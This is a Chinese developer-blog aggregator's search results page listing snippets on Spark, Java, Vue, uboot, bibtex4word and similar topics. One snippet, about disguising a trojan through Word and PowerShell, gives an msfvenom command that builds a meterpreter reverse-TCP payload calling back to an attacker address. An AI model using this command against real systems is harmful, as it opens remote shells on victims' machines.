码迷,mamicode.com
首页 >  
搜索关键字:.pages 转化 word    ( 34927个结果
03 Spark RDD编程基础
1. 准备文本文件从文件创建RDD lines=sc.textFile()筛选出含某个单词的行 lines.filter()lambda 参数:条件表达式 2. 生成单词的列表从列表创建RDD words=sc.parallelize()筛选出长度大于2 的单词 words.filter() ...
分类:其他好文   时间:2021-03-30 13:18:46    阅读次数:0
hyrobot使用
参考:http://www.python3.vip/tut/auto/hyrobot/01/ 1、简介 黑羽robot 在 RobotFramework 基础上,将Python代码转化为.ride可以运行的程序。 并且汉化测试报告。 2、被测系统 https://pan.baidu.com/s/1r ...
分类:其他好文   时间:2021-03-30 13:03:32    阅读次数:0
实验1 C语言开发环境使用和编程初体验
实验任务1 #include <stdio.h> int main() { printf(" 0 \n"); printf("<n>\n"); printf("I I\n"); printf("\n"); printf(" 0 \n"); printf("<n>\n"); printf("I I\n ...
分类:编程语言   时间:2021-03-18 14:31:02    阅读次数:0
Java注释
单行 多行 文档 public class HelloWorld { public static void main (String [] args) { //output hello world /* output hello world */ /** * @description hellowo ...
分类:编程语言   时间:2021-03-18 14:20:10    阅读次数:0
Powershell配合word伪装木马执行
环境: win7 64位,word2013 生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1 ? 放到VPS上,这里我们放到本机搭 ...
分类:系统相关   时间:2021-03-18 14:14:35    阅读次数:0
linux-进程
进程的特性 继承性: 子进程会继承父进程的一些信息:文件描述符、实际用户ID、实际组ID、有效用户ID、有效组ID、进程组ID、添加组ID、对话期ID、控制终端、设置-用户-ID标志和设置-组-ID标志、当前工作目录、根目录、文件方式创建字、信号屏蔽和排列、对任意打开文件描述大的在执行时关闭标志、环 ...
分类:系统相关   时间:2021-03-17 15:00:37    阅读次数:0
vue watch监听全局的projectCode
Vue下的watch监听 2018-10-15 本文记录一下项目中的watch的用法 watch监听全局的projectCode 12345678910111213141516171819202122232425262728 mounted() { this.$nextTick(() => { // ...
分类:其他好文   时间:2021-03-16 13:59:27    阅读次数:0
uboot misc
.uboot下如何查看内存里的数据 使用md工具 md.b $address $count (从地址$address处显示$count个字节的数据,b=byte,8位) md.w $address $count (从地址$address处显示$count个字的数据,w=word,16位) md.l  ...
分类:其他好文   时间:2021-03-16 11:48:00    阅读次数:0
bib+windows+word=bibtex4word插件使用方法
访问官网:http://www.ee.ic.ac.uk/hp/staff/dmb/perl/index.html 写在前面 首先需要确定电脑上已经装好texlive, 包含了 bibtex.exe,如: 然后,装好了word, 下载bibtex4word http://www.ee.ic.ac.uk ...
分类:Windows程序   时间:2021-03-11 16:37:27    阅读次数:0
1668. 最大重复子字符串
题目:给你一个字符串 sequence ,如果字符串 word 连续重复 k 次形成的字符串是 sequence 的一个子字符串,那么单词 word 的 重复值为 k 。单词 word 的 最大重复值 是单词 word 在 sequence 中最大的重复值。如果 word 不是 sequence 的 ...
分类:其他好文   时间:2021-03-11 10:31:48    阅读次数:0
34927条   上一页 1 ... 29 30 31 32 33 ... 3493 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!